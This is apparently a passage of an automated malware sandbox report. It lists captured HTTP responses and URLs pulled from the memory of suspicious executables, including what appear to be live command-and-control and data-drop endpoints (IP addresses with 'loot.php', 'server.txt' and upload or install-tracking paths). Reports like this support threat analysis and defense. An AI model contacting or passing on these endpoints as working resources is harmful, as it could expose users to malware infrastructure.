                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:24 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=DUlwbPlsV._tPzPtxXTXxjl3uUFCpqQ6ZMase4QvG30-1724230824-1.0.1.1-dwMee_HmryBstTOjBO6d1iHgWGDZbI3_ClcLoKg5p_wyTAgyktA5Qq__EShRqlJxwjgVoTdlcfozpF6LxbKmtw; path=/; expires=Wed, 21-Aug-24 09:30:24 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=lQRLgUm1QoK%2F1HvfdaLzTTXgOWaDky9AaK5My2J5K1UgnddD5tVfEyiKsrZ3eX77HQSN%2FOxAA8IgurNG%2FdFybvqvPJyIOmaVDGF1P0yI67uoFA6%2BmIBx6RSg54tN%2FbEcHLZD2A%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=P5J4py93aGuJf2iVPIBUq7jLgDyGN._b3ye68lBsHwo-1724230824409-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696ebc7bde5e74-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:30 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=xYgYULbsG3tyKJByRJxxNsnnGNm9EkxlSyc5YLuBQ68-1724230830-1.0.1.1-Sx1NQNE0xZ2szSNFOnRXb1ghDtAD6MYRjCdBPg.qJ0G6Rl3mtYlrhtWbgyI.nxx2Ou6FyhY4szFAqi_PShlmbA; path=/; expires=Wed, 21-Aug-24 09:30:30 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=n3NSi%2BuZFkocpech5P2sU7dTOg6obM7a3CZ%2Bk2FHEabn9ACGEyEmfA%2BOublDfwwsGyiaFZbwqJUZwJyXj9MOTwg%2FN0x3RlBaUuHdDfgrh%2Bf80CukkoUFmkSeSkPCO2arGr%2FVcA%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=DwYx9gQl5y0SE_Pp6M30Mg7isTI85M56GwwPVmX0kjw-1724230830049-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696edfb904426d-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:35 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=gpcZ2YLCYhCVYKwNMOsyC1cDx2Cm7SmZP6sLAkgL4GY-1724230835-1.0.1.1-v8oAKQ.8gnbRzmu70mkw6aXZaJvh1i.kyEy1DmlgLadqmROA2Enok1Df51JCTb1jeNQG5nmTp7gugIC6HqR_.w; path=/; expires=Wed, 21-Aug-24 09:30:35 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=L9atcKiCru3a9Vu2yNTHddZA0vYztIvdNjQyVOFdOSmowUYklsDcODMCWdR6PSimiI2hiLSGFYx24cAZIH8tPLUTnDaABavOs2o8DsAmXKqaYb4bWflN7pLIi51h6UFNy4Rkvw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=Si5eXBO9Nadt0DBd2XxLIKh5JF6xeOJJa_I1aWjpypI-1724230835705-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f031de94304-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:41 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=CG2bMzkwFhzo_6W5zDhheua_EGuaOJe92elWCzkdJ7U-1724230841-1.0.1.1-ZKTjsN3pMRE.Iuyxe9APXiV.pZvzxOe8Fd6y6eIFfcISZd9uKltep5pGtCoHldMc1ZVE_Xa4aztuGNctbG2KkQ; path=/; expires=Wed, 21-Aug-24 09:30:41 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XFgtSjlnOS%2FletsIhKkOOfv942q9%2BSKOv5UBXQUL7dZOBKYWN90PIP9%2FMIUCjz3fLi8AOuGkRKC9lIbkdp3xHKK29YQrXGeOtyyWcaKwTIgW2oEf3lzcwkQxDIr4%2Fw%2FG11kC8w%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=4.fEzU4NP3qPT67aKbxzdo9khcXBKp5geySeef9sOzA-1724230841350-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f265a601971-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:47 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ryhG8PrW2GoqettBiFQJoUr1.UAq9UIrv2sa1sis4eU-1724230847-1.0.1.1-rQ0jACcnVALW3kY9Dn9PdYHy2pVswGdOJ.1wnJAS41QrTW8CoyiULmLtB90_rNGNoEA97cgTm76x.KUwAi2h9Q; path=/; expires=Wed, 21-Aug-24 09:30:47 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=cfk1s4rnAVdavSZEQgSvlRiFi9I9tTaahZVrbIQAgOl%2Fe3CJBMLPYg4nWCnvwfT2n8FyNJwAjiWvcIaruaWoWP06yUsiBk29A%2FhSDs0wbto0GJ3yLqWg3%2FNV3rdZ%2Fs21l8cAZw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=uxUy69UtfTGgc_w3guur9ZGxSDrlJY0eiLq0bX9hFiM-1724230847131-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f4a7ed37292-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:52 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=nkUBmIBtxze4Ei2AYFyKtFZYwfCS9uHdCpJT1I11QWg-1724230852-1.0.1.1-DuQqOCTrKAGVK5GA3QCvkdor8QGv03DvT1pL.k5vTnnT14a8KQrXAur6CwkSjInS0e9p5skkNd3FWLB818eXNQ; path=/; expires=Wed, 21-Aug-24 09:30:52 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=K9K3VOPZsMXZ9y4Za9KPzV7go3MxZ24piwL9DXEilTNB6JBS8%2F6CGW8U3NlQmwE4QA1VQQi1RI209N6NbqNFNrLgdyIF14vPkZcGlJ1fiaI40na4gaYgdzn5v5WnJvRgtSfbAw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=NoM7KgtlJXSIOluf.rpbowjI0XHoHepIeAUSdyGsi88-1724230852783-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f6dda02c35f-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:00:58 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=ZYThuz8gU4Zjf8bttJRbbZ66RSbATbPjyH27xidCT6s-1724230858-1.0.1.1-vbfA_wmpp9QGlNswZmGk3p3f27MLEjPzJ9.LzgZhJa0nWIDFeuv6uul7SZQe04pVdtG2BgLBV83XQ8axMPgkXA; path=/; expires=Wed, 21-Aug-24 09:30:58 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=fPAZjCZKp1HxtZ9xciX%2B8fE%2F7xz5v%2B5nLZyQ7UKXVl7LsgO4dHPkTYbIXE2sFRu99hu4bepM3viw%2BJW8%2FfqntC6JWw1ztFlh0PHARghQLEBE0gkETH5d%2FxyCNGGPcLTUSU41og%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=TAdansgSXPEGma0KpPyPjPeyk_2zoSlOqI0w2mmFEXg-1724230858423-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696f911e4e43a6-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 09:01:04 GMTContent-Type: text/plain;charset=UTF-8Content-Length: 36Connection: closeX-Robots-Tag: noindex, nofollow, noarchive, nocache, noimageindex, noodpSet-Cookie: __cf_bm=QE8sXrft4O235HQa2l0sHP7XbF3mMirvFzhwqy9UYBI-1724230864-1.0.1.1-fqGuNa7aYkVO0oLFCATi7wnSkwKvyKFHvO6GYaAAjeBBnpCqk40xvQnaLeOu_eHSBHZkgaGb9_TDCCg3LqpWNw; path=/; expires=Wed, 21-Aug-24 09:31:04 GMT; domain=.discordapp.com; HttpOnly; SecureReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=WptpOnAp5y63yFrvDHjn6DW7Qu7%2BsmIs%2BatK502qbb33%2FAoNB1ZCO3EcB8TQ6L8K%2FduH9XbYhCO1YSyJynZF3gZIbOj9y%2FypDhypKWPd%2FSwK%2BeoJ6r5Hr3z0SM12MADis44rOw%3D%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Set-Cookie: _cfuvid=3.FDysOfRq8HCNmLtnF4lfo84o7BtaNJya51IP6dQgQ-1724230864112-0.0.1.1-604800000; path=/; domain=.discordapp.com; HttpOnly; Secure; SameSite=NoneServer: cloudflareCF-RAY: 8b696fb4aece19d7-EWRalt-svc: h3=":443"; ma=86400
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundDate: Wed, 21 Aug 2024 08:57:30 GMTContent-Type: text/html; charset=iso-8859-1Transfer-Encoding: chunkedConnection: keep-aliveCF-Cache-Status: DYNAMICReport-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=XMPZcVCLz7oUqPNw7shSOIByM9YE04cLZllZ7sOIyjnJq1H77lEDrCi9cQyWRmoqLpZoMuybl87M7Dn2MGKrqEdVk99EemzmpSS6LpICv0PAFi50r7UA4Pwk6TGeeoo%3D"}],"group":"cf-nel","max_age":604800}NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}Server: cloudflareCF-RAY: 8b696a7c7f237cab-EWRalt-svc: h3=":443"; ma=86400Data Raw: 34 36 65 0d 0a 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4e 6f 74 20 46 6f 75 6e 64 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 72 65 71 75 65 73 74 65 64 20 55 52 4c 20 77 61 73 20 6e 6f 74 20 66 6f 75 6e 64 20 6f 6e 20 74 68 69 73 20 73 65 72 76 65 72 2e 3c 2f 70 3e 0a 3c 73 63 72 69 70 74 3e 28 66 75 6e 63 74 69 6f 6e 28 29 7b 66 75 6e 63 74 69 6f 6e 20 63 28 29 7b 76 61 72 20 62 3d 61 2e 63 6f 6e 74 65 6e 74 44 6f 63 75 6d 65 6e 74 7c 7c 61 2e 63 6f 6e 74 65 6e 74 57 69 6e 64 6f 77 2e 64 6f 63 75 6d 65 6e 74 3b 69 66 28 62 29 7b 76 61 72 20 64 3d 62 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 64 2e 69 6e 6e 65 72 48 54 4d 4c 3d 22 77 69 6e 64 6f 77 2e 5f 5f 43 46 24 63 76 24 70 61 72 61 6d 73 3d 7b 72 3a 27 38 62 36 39 36 61 37 63 37 66 32 33 37 63 61 62 27 2c 74 3a 27 4d 54 63 79 4e 44 49 7a 4d 44 59 31 4d 43 34 77 4d 44 41 77 4d 44 41 3d 27 7d 3b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 27 73 63 72 69 70 74 27 29 3b 61 2e 6e 6f 6e 63 65 3d 27 27 3b 61 2e 73 72 63 3d 27 2f 63 64 6e 2d 63 67 69 2f 63 68 61 6c 6c 65 6e 67 65 2d 70 6c 61 74 66 6f 72 6d 2f 73 63 72 69 70 74 73 2f 6a 73 64 2f 6d 61 69 6e 2e 6a 73 27 3b 64 6f 63 75 6d 65 6e 74 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 61 29 3b 22 3b 62 2e 67 65 74 45 6c 65 6d 65 6e 74 73 42 79 54 61 67 4e 61 6d 65 28 27 68 65 61 64 27 29 5b 30 5d 2e 61 70 70 65 6e 64 43 68 69 6c 64 28 64 29 7d 7d 69 66 28 64 6f 63 75 6d 65 6e 74 2e 62 6f 64 79 29 7b 76 61 72 20 61 3d 64 6f 63 75 6d 65 6e 74 2e 63 72 65 61 74 65 45 6c 65 6d 65 6e 74 28 Data Ascii: 46e<!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>404 Not Found</title></head><body><h1>Not Found</h1><p>The requested URL was not found on this server.</p><script>(function(){function c(){var b=a.contentDocument||a.contentWindow.document;if(b){var d=b.createElement('script');d.innerHTML="window.__CF$cv$params={r:'8b696a7c7f237cab',t:'MTcyNDIzMDY1MC4wMDAwMDA='};var a=document.createElement('script')
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 7Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 08:57:50 GMTData Raw: 03 00 00 00 70 e8 c6 Data Ascii: p
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 08:57:50 GMT
                  Source: global trafficHTTP traffic detected: HTTP/1.1 404 Not FoundServer: nginx/1.18.0Content-Length: 0Content-Type: application/octet-streamDate: Wed, 21 Aug 2024 08:57:50 GMT
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003243000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.107/Z
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.000000000320B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.107/server.txt
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.000000000320B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.133.1.107/server.txti
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmp, Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001A58000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone$5
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone-:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone3:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone75
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone8
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001A6E000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixone?
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixoneG:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixoneMtM2-KF1hw
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixoneQ5
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixonea:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixonen:
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4154497418.0000000001AA3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://45.9.20.13/partner/loot.php?pub=mixonet:
                  Source: Mon17948100733a95c58.exe, 00000019.00000002.1780757499.0000000003988000.00000004.00000800.00020000.00000000.sdmp, Mon17948100733a95c58.exe, 00000020.00000002.4146181538.0000000000414000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://4tfdv6.rafilda.ru/1kerKKKKOOOOnel3KKKKOOOO2-useIntPtrr32.dlIntPtrl
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.178.186.149/
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003237000.00000004.00000020.00020000.00000000.sdmp, Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.00000000032C3000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.178.186.149/base/api/statistics.php
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.178.186.149/base/api/statistics.php0(
                  Source: Mon17b5f403be4d8d6b.exe, 00000017.00000002.2185781811.0000000003267000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://51.178.186.149/j(
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmp, Mon17eac6d534bfd22c7.exe, 0000001F.00000002.4146187466.0000000000402000.00000040.00000400.00020000.00000000.sdmpString found in binary or memory: http://7hni.kamisime.ru/1kerKKKKOOOOnel3KKKKOOOO2-useIntPtrr32.dlIntPtrl
                  Source: Mon179e1058f256.exe, 0000001D.00000002.4162175054.00000000034EC000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4167060007.0000000006390000.00000004.08000000.00040000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4166034306.0000000005C50000.00000004.08000000.00040000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000003.1802932881.00000000018A9000.00000004.00000020.00020000.00000000.sdmp, Mon179e1058f256.exe, 0000001D.00000002.4165465602.00000000047D5000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://8yfg.federguda.ru/1kerKKKKOOOOnel3KKKKOOOO2-useIntPtrr32.dlIntPtrl
                  Source: explorer.exe, 0000002F.00000002.4175875048.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://cacerts.digicert.com/DigiCertGlobalRootG2.crt0
                  Source: Mon178817e243.exe, 00000016.00000002.4158008324.0000000003394000.00000004.00000800.00020000.00000000.sdmp, Mon178817e243.exe, 00000016.00000002.4158008324.0000000003293000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://cdn.discordapp.com
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.comodoca.com/AAACertificateServices.crl04
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningCAR36.crl0y
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crl.sectigo.com/SectigoPublicCodeSigningRootR46.crl0
                  Source: svchost.exe, 0000002B.00000002.3465357200.000002804D88C000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://crl.ver)
                  Source: explorer.exe, 0000002F.00000002.4175875048.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl3.digicert.com/DigiCertGlobalRootG2.crl07
                  Source: explorer.exe, 0000002F.00000002.4175875048.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000002.4164547878.00000000079FB000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1908199562.000000000982D000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000000.1884635558.00000000079FB000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://crl4.digicert.com/DigiCertGlobalRootG2.crl0
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningCAR36.crt0#
                  Source: Mon17eac6d534bfd22c7.exe, 0000000E.00000002.1820493066.0000000003E41000.00000004.00000800.00020000.00000000.sdmpString found in binary or memory: http://crt.sectigo.com/SectigoPublicCodeSigningRootR46.p7c0#
                  Source: svchost.exe, 0000002B.00000003.1818483646.000002804DA38000.00000004.00000800.00020000.00000000.sdmp, edb.log.43.dr, qmgr.db.43.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/chromewebstore/L2Nocm9tZV9leHRlbnNpb24vYmxvYnMvYjFkQUFWdmlaXy12MHFU
                  Source: edb.log.43.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome/acosgr5ufcefr7w7nv4v6k4ebdda_117.0.5938.132/117.0.5
                  Source: qmgr.db.43.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaa5khuklrahrby256zitbxd5wq_1.0.2512.1/n
                  Source: qmgr.db.43.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/acaxuysrwzdnwqutaimsxybnjbrq_2023.9.25.0/
                  Source: svchost.exe, 0000002B.00000003.1818483646.000002804DA38000.00000004.00000800.00020000.00000000.sdmp, edb.log.43.dr, qmgr.db.43.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adhioj45hzjkfunn7ccrbqyyhu3q_20230916.567
                  Source: svchost.exe, 0000002B.00000003.1818483646.000002804DA38000.00000004.00000800.00020000.00000000.sdmp, edb.log.43.dr, qmgr.db.43.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/adqyi2uk2bd7epzsrzisajjiqe_9.48.0/gcmjkmg
                  Source: svchost.exe, 0000002B.00000003.1818483646.000002804DA6D000.00000004.00000800.00020000.00000000.sdmp, edb.log.43.dr, qmgr.db.43.drString found in binary or memory: http://edgedl.me.gvt1.com/edgedl/release2/chrome_component/dix4vjifjljmfobl3a7lhcpvw4_414/lmelglejhe
                  Source: qmgr.db.43.drString found in binary or memory: http://f.c2r.ts.cdn.office.net/pr/492350f6-3a01-4f97-b9c0-c7c6ddf67d60/Office/Data/v32_16.0.16827.20
                  Source: Mon1785436ae78.exe, 0000001A.00000002.4153934942.0000000001A1B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://ggg-cl.biz/o
                  Source: explorer.exe, 0000002F.00000002.4187060653.000000000FFA0000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://gmpeople.com/upload/
                  Source: explorer.exe, 0000002F.00000002.4185930255.000000000CBD7000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000003.3108003090.000000000CB24000.00000004.00000001.00020000.00000000.sdmp, explorer.exe, 0000002F.00000003.3108312317.000000000CBD3000.00000004.00000001.00020000.00000000.sdmpString found in binary or memory: http://gmpeople.com/upload/application/x-www-form-urlencodedMozilla/5.0
                  Source: setup_installer.exe, 00000001.00000003.1691383572.000000000352D000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1969066359.0000000000880000.00000004.00000020.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp, setup_install.exe.1.drString found in binary or memory: http://hsiens.xyz/
                  Source: setup_install.exe, 00000002.00000002.1969543955.0000000002584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hsiens.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=139&megid=27382937
                  Source: setup_install.exe, 00000002.00000002.1969543955.000000000258A000.00000004.00000020.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1969066359.000000000088B000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hsiens.xyz/addInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=139&megid=27382937&oname
                  Source: setup_install.exe, 00000002.00000002.1969543955.0000000002584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hsiens.xyz/addInstallImpression.php?key=125478824515ADNxu2ccbwe&ip=&oid=139
                  Source: setup_install.exe, 00000002.00000002.1969543955.0000000002584000.00000004.00000020.00020000.00000000.sdmpString found in binary or memory: http://hsiens.xyz/myip.php
                  Source: setup_installer.exe, 00000001.00000003.1691383572.000000000352D000.00000004.00001000.00020000.00000000.sdmp, setup_install.exe, 00000002.00000002.1968120859.00000000004A2000.00000002.00000001.01000000.00000006.sdmp, setup_install.exe.1.drString found in binary or memory: http://hsiens.xyz/myip.phpaddInstall.php?key=125478824515ADNxu2ccbwe&ip=&oid=139&megid=27382937addIn
